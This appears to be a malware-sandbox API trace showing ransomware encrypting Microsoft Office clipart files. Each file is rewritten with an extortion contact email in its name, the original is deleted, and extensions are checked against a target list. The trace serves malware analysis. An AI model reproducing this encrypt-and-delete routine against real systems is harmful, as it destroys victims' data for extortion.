GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf")) returned 0x220 [0196.512] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0196.512] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.512] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0196.513] GetLastError () returned 0x0 [0196.513] ReadFile (in: hFile=0x338, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x132c, lpOverlapped=0x0) returned 1 [0196.516] WriteFile (in: hFile=0x358, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1330, lpOverlapped=0x0) returned 1 [0196.517] ReadFile (in: hFile=0x338, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.517] WriteFile (in: hFile=0x358, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0196.517] SetEndOfFile (hFile=0x358) returned 1 [0196.517] CloseHandle (hObject=0x358) returned 1 [0196.517] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.517] SetEndOfFile (hFile=0x338) returned 1 [0196.518] CloseHandle (hObject=0x338) returned 1 [0196.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.519] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf")) returned 1 [0196.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.519] lstrlenW (lpString=".doc") returned 4 [0196.519] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.519] lstrlenW (lpString=".docx") returned 5 [0196.519] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.519] lstrlenW (lpString=".pdf") returned 4 [0196.519] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.519] lstrlenW (lpString=".xls") returned 4 [0196.519] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.519] lstrlenW (lpString=".xlsx") returned 5 [0196.519] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.520] lstrlenW (lpString=".ppt") returned 4 [0196.520] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.520] lstrlenW (lpString=".zip") returned 4 [0196.520] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.520] lstrlenW (lpString=".rar") returned 4 [0196.520] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.520] lstrlenW (lpString=".bz2") returned 4 [0196.520] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.520] lstrlenW (lpString=".7z") returned 3 [0196.520] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.520] lstrlenW (lpString=".dbf") returned 4 [0196.520] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.520] lstrlenW (lpString=".1cd") returned 4 [0196.520] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.520] lstrlenW (lpString=".jpg") returned 4 [0196.520] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.520] lstrlenW (lpString=".doc") returned 4 [0196.520] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.520] lstrlenW (lpString=".docx") returned 5 [0196.520] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.520] lstrlenW (lpString=".pdf") returned 4 [0196.520] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.521] lstrlenW (lpString=".xls") returned 4 [0196.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.521] lstrlenW (lpString=".xlsx") returned 5 [0196.521] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.521] lstrlenW (lpString=".ppt") returned 4 [0196.521] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.521] lstrlenW (lpString=".zip") returned 4 [0196.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.521] lstrlenW (lpString=".rar") returned 4 [0196.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.521] lstrlenW (lpString=".bz2") returned 4 [0196.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.521] lstrlenW (lpString=".7z") returned 3 [0196.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.521] lstrlenW (lpString=".dbf") returned 4 [0196.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.521] lstrlenW (lpString=".1cd") returned 4 [0196.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF") returned 68 [0196.521] lstrlenW (lpString=".jpg") returned 4 [0196.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.521] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0196.522] lstrlenW (lpString="J0152716.WMF") returned 12 [0196.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0196.522] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=4580) returned 1 [0196.522] CloseHandle (hObject=0x338) returned 1 [0196.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf")) returned 0x220 [0196.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0196.523] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.523] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0196.523] GetLastError () returned 0x0 [0196.523] ReadFile (in: hFile=0x338, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x11e4, lpOverlapped=0x0) returned 1 [0196.667] WriteFile (in: hFile=0x358, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x11f0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x11f0, lpOverlapped=0x0) returned 1 [0196.677] ReadFile (in: hFile=0x338, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.677] WriteFile (in: hFile=0x358, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0196.677] SetEndOfFile (hFile=0x358) returned 1 [0196.679] CloseHandle (hObject=0x358) returned 1 [0196.680] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.680] SetEndOfFile (hFile=0x338) returned 1 [0196.680] CloseHandle (hObject=0x338) returned 1 [0196.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf")) returned 1 [0196.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.682] lstrlenW (lpString=".doc") returned 4 [0196.682] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.682] lstrlenW (lpString=".docx") returned 5 [0196.682] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0196.682] lstrlenW (lpString=".pdf") returned 4 [0196.682] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.682] lstrlenW (lpString=".xls") returned 4 [0196.682] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.682] lstrlenW (lpString=".xlsx") returned 5 [0196.682] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0196.682] lstrlenW (lpString=".ppt") returned 4 [0196.682] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.682] lstrlenW (lpString=".zip") returned 4 [0196.682] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.682] lstrlenW (lpString=".rar") returned 4 [0196.682] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.682] lstrlenW (lpString=".bz2") returned 4 [0196.682] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.682] lstrlenW (lpString=".7z") returned 3 [0196.682] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.682] lstrlenW (lpString=".dbf") returned 4 [0196.682] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.682] lstrlenW (lpString=".1cd") returned 4 [0196.682] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.683] lstrlenW (lpString=".jpg") returned 4 [0196.683] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.683] lstrlenW (lpString=".doc") returned 4 [0196.683] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.683] lstrlenW (lpString=".docx") returned 5 [0196.683] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0196.683] lstrlenW (lpString=".pdf") returned 4 [0196.683] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.683] lstrlenW (lpString=".xls") returned 4 [0196.683] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.683] lstrlenW (lpString=".xlsx") returned 5 [0196.683] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0196.683] lstrlenW (lpString=".ppt") returned 4 [0196.683] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.683] lstrlenW (lpString=".zip") returned 4 [0196.683] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.683] lstrlenW (lpString=".rar") returned 4 [0196.683] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.683] lstrlenW (lpString=".bz2") returned 4 [0196.683] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.683] lstrlenW (lpString=".7z") returned 3 [0196.683] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.683] lstrlenW (lpString=".dbf") returned 4 [0196.683] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.684] lstrlenW (lpString=".1cd") returned 4 [0196.684] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF") returned 68 [0196.684] lstrlenW (lpString=".jpg") returned 4 [0196.684] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.684] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0196.684] lstrlenW (lpString="J0152890.WMF") returned 12 [0196.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.685] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=1940) returned 1 [0196.685] CloseHandle (hObject=0x3a0) returned 1 [0196.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf")) returned 0x220 [0196.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.686] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.686] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0196.695] GetLastError () returned 0x0 [0196.695] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x794, lpOverlapped=0x0) returned 1 [0196.701] WriteFile (in: hFile=0x33c, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x7a0, lpOverlapped=0x0) returned 1 [0196.702] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.702] WriteFile (in: hFile=0x33c, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0196.703] SetEndOfFile (hFile=0x33c) returned 1 [0196.703] CloseHandle (hObject=0x33c) returned 1 [0196.703] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.703] SetEndOfFile (hFile=0x3a0) returned 1 [0196.704] CloseHandle (hObject=0x3a0) returned 1 [0196.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.704] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf")) returned 1 [0196.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.705] lstrlenW (lpString=".doc") returned 4 [0196.705] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.705] lstrlenW (lpString=".docx") returned 5 [0196.705] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0196.705] lstrlenW (lpString=".pdf") returned 4 [0196.705] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.705] lstrlenW (lpString=".xls") returned 4 [0196.705] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.705] lstrlenW (lpString=".xlsx") returned 5 [0196.705] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0196.705] lstrlenW (lpString=".ppt") returned 4 [0196.705] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.705] lstrlenW (lpString=".zip") returned 4 [0196.705] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.705] lstrlenW (lpString=".rar") returned 4 [0196.705] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.705] lstrlenW (lpString=".bz2") returned 4 [0196.705] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.705] lstrlenW (lpString=".7z") returned 3 [0196.705] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.705] lstrlenW (lpString=".dbf") returned 4 [0196.705] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.705] lstrlenW (lpString=".1cd") returned 4 [0196.705] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.705] lstrlenW (lpString=".jpg") returned 4 [0196.706] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.706] lstrlenW (lpString=".doc") returned 4 [0196.706] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.706] lstrlenW (lpString=".docx") returned 5 [0196.706] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0196.706] lstrlenW (lpString=".pdf") returned 4 [0196.706] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.706] lstrlenW (lpString=".xls") returned 4 [0196.706] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.706] lstrlenW (lpString=".xlsx") returned 5 [0196.706] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0196.706] lstrlenW (lpString=".ppt") returned 4 [0196.706] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.706] lstrlenW (lpString=".zip") returned 4 [0196.706] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.706] lstrlenW (lpString=".rar") returned 4 [0196.707] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.707] lstrlenW (lpString=".bz2") returned 4 [0196.707] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.707] lstrlenW (lpString=".7z") returned 3 [0196.707] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.707] lstrlenW (lpString=".dbf") returned 4 [0196.707] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.707] lstrlenW (lpString=".1cd") returned 4 [0196.707] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF") returned 68 [0196.707] lstrlenW (lpString=".jpg") returned 4 [0196.707] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.707] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0196.707] lstrlenW (lpString="J0152894.WMF") returned 12 [0196.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.708] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=11348) returned 1 [0196.708] CloseHandle (hObject=0x3a0) returned 1 [0196.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf")) returned 0x220 [0196.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 